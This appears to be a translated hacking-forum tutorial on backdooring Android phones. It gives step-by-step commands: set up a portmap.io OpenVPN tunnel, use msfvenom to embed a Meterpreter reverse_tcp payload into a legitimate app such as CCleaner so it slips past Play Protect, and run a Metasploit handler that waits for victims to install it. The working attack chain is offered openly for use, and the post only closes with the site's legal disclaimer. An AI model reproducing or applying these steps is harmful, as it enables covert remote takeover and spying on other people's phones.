How to Hack Android Phones - How to Use Portmap

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Kullanıcı1233

Kıdemli Üye
19 Tem 2011
4,371
12
yf2aKd.gif


Hi, I'm going to show you how to install backdoor to Android by using portmap. Ideal for who have port shortage. You can use it for other payloads. This topic was explained on Windows but I will explain it on Linux.

Lc61V8.png


Portmap offers you port service as ssh or open vpn.

M627S0.png


Go to portmap.io and register. You need to enter correct e-mail because it needs confirmation.

9VexL4.png


and click on "create new configuration"

OWN9I2.png


We should fill the fields and click Generate button at the bottom.

Name: no need to change it
Type: OpenVPN
Proto: tcp
Comment: write whatever you want.

H57RKB.png


zUBxSe.png


STMyzK.png


Our config file has created. Let's click on "Create" button

0yeWTV.png


It appeared as OpenVPN/Tcp in the configurations section. Let's move on to the Mapping Rules section and create a rule.

4MNJ3C.png


We should click on the "CREATE NEW RULE" button

4MCceL.png


Just you need to type 7777,4444,1604 or something like that in Port on your Pc. And we click on "Create" button.

fBNCfQ.png


Let's copy the address in the rule section and take it somewhere else. Click on the "Config/first" and click on the download button.

AB5Ha6.png


zUBxSe.png


zyzMfQ.png


After downloading our config file, we won't use portmap, we will download openVPN and create a payload.

I2bRPx.png


Let's open openvpn by opening the terminal. We install with the "apt-get install openvpn" command, btw It already installed in some linux versions.

a5Mf9y.png


Well, we need to connet with our config file, Open the terminal in that folder wherever your config file is. Mine is in the downloads folder so I am going to downloads folder with cd command. To connect,

openvpn --config configname.ovpn

for example: openvpn --config inspytht1.first1.ovpn

I5LdKK.png


You will see "Initialization Sequence Completed" when connected with OpenVPN.

P7dPAC.png


Let's create backdoor, we will use LHOST, kind of localhost because we will use with OpenVPN. I am going to use ccleaner app for payload. You can merge it to other apps, whatever you want. So you can bypass the Play Protect protection.

Command: msfvenom -x filenamethatyouwanttomerge.apk -p android/meterpreter/reverse_tcp lhost=portmap ip lport=portmap port -o çıkacak dosya adı.apk

Example: msfvenom -x ccleaner-v1.apk -p android/meterpreter/reverse_tcp lhost=inspytht1-43971.portmap.host lport=43971 -o ccleaner.apk

K2IyMU.png


As you can see, a payload occurred successfully. Now we are using service postgresql start and msfconsole command.

JMA16U.png


zUBxSe.png


WJ3fcy.png


zUBxSe.png


LPM63K.png


After opening the msf,
we select the exploit with this command: "use exploit/multi/handler" and we select the payload with this command: "set payload android/meterpreter/reverse_tcp"

dCMUb2.png


zUBxSe.png


1AGe2U.png


set LHOST portmap ip

Example: set LHOST inspytht1-43971.portmap.host

8GLIO7.png


set LPORT (should be 4 digits)

example: set LPORT 7777

SOB7UU.png


We selected the port and ip. Finally, we should enter the exploit command and expect them to open the payload. I will open it on my phone with mobile data(different ip)

It worked successfully

5R9QPU.png


Well, The ip and port that we received with portmap will be entered here. You need to enter the 5 digits port (43971) when creating the payload. And you need to enter 4 digits port (7777) while eavesdroping. You can see what you can do with the help command.

zSaLdM.png


source: https://www.turkhackteam.org/trojan...onlari-hackleyin-portmap-kullanimi-inspy.html

Translator: dRose98
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.